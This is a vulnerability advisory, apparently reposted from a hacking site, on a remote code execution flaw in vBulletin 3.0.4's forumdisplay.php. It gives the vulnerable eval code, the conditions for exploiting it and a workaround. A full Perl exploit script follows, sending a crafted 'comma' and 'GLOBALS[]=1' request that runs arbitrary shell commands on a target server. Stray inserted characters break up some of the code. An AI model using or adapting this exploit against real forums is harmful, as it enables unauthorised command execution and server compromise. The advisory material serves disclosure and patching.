vBulletin is "a powerful and widely used bulletin board system, based on PHP language and MySQL database".
A vulnerability in vBulletin''s forumdisplay.php allows a remote attacker to cause the PHP script to execute arbitrary code via the ''comma'' variable.
Credit:
The information has been provided by al3ndaleeb.
Details
Vulnerable Systems:
* vBulletin version 3.0.4 and prior
Immune Systems:
* vBulletin version 3.0.5 or newer
Vulnerable code in forumdisplay.php:
if ($vboptions[''showforumusers''])
{
.
.
.
.
if ($bbuserinfo[''userid''])
{
...
$comma = '', '';
}
...
while ($loggedin = $DB_site->fetch_array($forumusers))
{
...
eval(''$activeusers .= "'' . $comma . 字串1
fetch_template(''forumdisplay_loggedinuser'') . ''";''); <<==== (Vuln)
$comma = '', '';
...
}
...
}
Prequsites:
* $vboptions[''showforumusers''] == True , the admin must set showforumusers ON in vBulletin options
* $bbuserinfo[''userid''] == 0 , you must be an visitor/guest
* $DB_site->fetch_array($forumusers) == True , when you visit the forums, it must has at least one user show the forum
* magic_quotes_gpc must be OFF
* You must bypass unset($GLOBALS["$_arrykey"]) code in init.php by using: GLOBALS[]=1
Workaround:
* Disable showforumusers in vbulletin options .
* add the next line before if ($vboptions[''showforumusers'']) $comma = '''';
Exploit:
#!/usr/bin/perl
# vbulletin 3.0.4 remote command execution by pokleyzz <pokleyzz_at_scan-associates.net>
#
# Requirement:
# showforumusers ON
#
#
# bug found by AL3NDALEEB <al3ndaleeb_at_uk2.net> 字串5
#
# usage :
# vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command>
#
# example :
# vbulletin30-xp.pl http://192.168.1.78/forumdisplay.php 1 "ls -la"
#
# !! Happy Chinese new Year !!
use IO::Socket;
sub parse_url {
local($url) = @_;
if ($url =~ m#^(\w+):#) {
$protocol = $1;
$protocol =~ tr/A-Z/a-z/;
} else {
return undef;
}
if ($protocol eq "http") {
if ($url =~ m#^\s*\w+://([\w-\.]+):?(\d*)([^ \t]*)$#) {
$server = $1;
$server =~ tr/A-Z/a-z/;
$port = ($2 ne "" ? $2 : $http_port);
$path = ( $3 ? $3 : ''/'');
return ($protocol, $server, $port, $path);
}
return undef;
}
}
sub urlencode{
my($esc) = @_;
$esc =~ s/^\s+\s+$//gs;
$esc =~ s/([^a-zA-Z0-9_\-.])/uc sprintf("%%%02x",ord($1))/eg;
字串8
$esc =~ s/ /\+/g;
$esc =~ s/%20/\+/g;
return $esc;
}
$url = $ARGV[0];
$fid = $ARGV[1];
$cmd = urlencode($ARGV[2]);
$http_port = 80;
$shellcode ="GLOBALS[]=1&f=$fid&cmd=$cmd&comma=}}";
@target = parse_url($url);
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $target[1],
PeerPort => $target[2],
) or die "\nUnable to connect\n";
$conn -> autoflush(1);
print $conn "GET $target[3]?$shellcode HTTP/1.1\r\nHost: $target[1]:$target[2]\r\nConnection: Close\r\n\r\n";
while (<$conn>){
print $_;
}
close $conn;
文章来源地址:http://www.hackhome.com/html/wlcl/wlaq/2006/0610/26606.html